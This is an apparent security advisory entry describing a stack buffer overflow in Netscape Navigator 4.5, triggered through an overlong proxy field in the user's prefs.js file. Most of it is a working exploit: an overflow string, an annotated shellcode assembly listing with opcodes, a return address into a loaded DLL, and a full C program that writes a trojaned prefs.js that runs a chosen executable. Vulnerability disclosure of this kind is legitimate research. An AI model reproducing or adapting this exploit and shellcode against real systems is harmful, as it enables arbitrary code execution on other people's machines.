COMMAND
Netscape Navigator/Communicator
SYSTEMS AFFECTED
Netscape Navigator/Communicator 4.5
PROBLEM
Steve Fewer found following. He recently uncovered a stack based
buffer overflow in NN which allowed him to execute arbitrary code.
It is a local Attack where the offending party is the users
'prefs.js' file, usually stored in
c:\program files\netscape\users\*** where *** is a user
It occurs when NN reads in an entry greater than 80 bytes in the
network.proxy.http field. Netscape have been notified of this
problem. E.g.
user_pref("network.proxy.http","AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC");
The EBP is overrun at bytes 81 - 84 and the EIP is overrun at
bytes 85 - 89, from there on your code can be placed. The first
80 bytes get blown away when you smash the stack but you are left
with a possible 500 bytes or more for your exploit code, (500 was
the most that Steve checked). You're first byte of code is
pointed to by the ESP.
To concoct an exploit for this to see if it was actually
exploitable Steve pointed his EIP into a 'JMP ESP' located at
7FD035EB in shell32.dll (v4.72.3110.6) which NN loads. Having got
back to his exploit buffer he simply made it execute a file called
app.exe, which should be located in \windows\command\ and then
made it call exit() to tidy up so we don't cause an access
violation, obviously there is room for a more insidious exploit
but author doesn't view this as an enormously dangerous security
flaw so it didn't warrant writing anything more sophisticated.
For protection you could try the latest version of NN which
is 4.7. This was all created/tested on Windows98 running on an
Intel PII400 with 128MB RAM.
This is the assembly which runs a file app.exe and then calls
exit() to clean up. The op codes are to the right. Steve called
system() at address 78019824 in msvcrt.dll v6.00.8397.0 to run
app.exe and exit() at address 78005504 in the same DLL to tidy up.
mov esp,ebp // 8BE5
push ebp // 55
mov ebp,esp // 8BEC
xor edi,edi // 33FF
push edi // 57
sub esp,04h // 83EC04
mov byte ptr [ebp-08h],61h // C645F861
mov byte ptr [ebp-07h],70h // C645F970
mov byte ptr [ebp-06h],70h // C645FA70
mov byte ptr [ebp-05h],2Eh // C645FB2E
mov byte ptr [ebp-04h],65h // C645FC65
mov byte ptr [ebp-03h],78h // C645FD78
mov byte ptr [ebp-02h],65h // C645FE65
mov eax, 0x78019824 // B824980178
push eax // 50
lea eax,[ebp-08h] // 8D45F8
push eax // 50
call dword ptr[ebp-0ch] // FF55F4
push ebp // 55
mov ebp,esp // 8BEC
mov edx,0xFFFFFFFF // BAFFFFFFFF
sub edx,0x87FFAAFB // 81EAFBAAFF87
push edx // 52
xor eax,eax // 33C0
push eax // 50
call dword ptr[ebp-04h] // FF55FC
The Exploit:
/* Stack based buffer overflow exploit for Netscape Navigator 4.5
* Author Steve Fewer, 22-12-99. Mail me at darkplan@oceanfree.net
*
* Netscape Navigator causes a buffer overflow when reading from
* the users "prefs.js" file. If it reads a string longer than 80
* bytes in the user_pref("network.proxy.http", "proxy.com");
* field it smashes the stack overwrighting the EIP and EBP. This
* can be used to execute arbitrary code.
*
* Tested with Netscape Navigator 4.5 using Windows98 on an Intel
* PII 400 with 128MB RAM
*
* http://indigo.ie/~lmf
*/
#include <stdio.h>
#include <string.h>
int main()
{
printf("\n\n\t\t........................................\n");
printf("\t\t.....Netscape Navigator 4.5 exploit.....\n");
printf("\t\t........................................\n");
printf("\t\t.....Author: Steve Fewer, 22-12-1999....\n");
printf("\t\t.........http://indigo.ie/~lmf..........\n");
printf("\t\t........................................\n\n");
// the first 80 bytes. These get blown away when the stack goes down.
char buff[96];
// the EBP, we don't need to use it so fill it with B's
char ebp[8] = "BBBB";
// we point the EIP into msvcrt.dll v6.00.8397.0 where we find a JMP ESP @ 7FD035EB
char eip[8] = "\xEB\x35\xD0\x7F";
// the is our 'arbitrary code', it just runs a file app.exe from the \WINDOWS\COMMAND directory then calls exit() to clean up
char sploit[128] = "\x55\x8B\xEC\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x61\xC6\x45\xF9\x70\xC6\x45\xFA\x70\xC6\x45\xFB\x2E\xC6\x45\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\xB8\x24\x98\x01\x78\x50\x8D\x45\xF8\x50\xFF\x55\xF4\x55\x8B\xEC\xBA\xFF\xFF\xFF\xFF\x81\xEA\xFB\xAA\xFF\x87\x52\x33\xC0\x50\xFF\x55\xFC";
FILE *file;
for(int i=0;i<80;i++)
{
buff[i] = 0x90;
}
// just create our new, 'trojand' prefs.js file
file = fopen("prefs.js","wb");
// and slap in the the nasty sploit
fprintf(file,"user_pref(\"network.proxy.http\", \"%s%s%s%s\");", buff, ebp, eip, sploit);
printf("\t created file prefs.js loaded with the exploit.\n");
return 0;
}
SOLUTION
Nothing yet.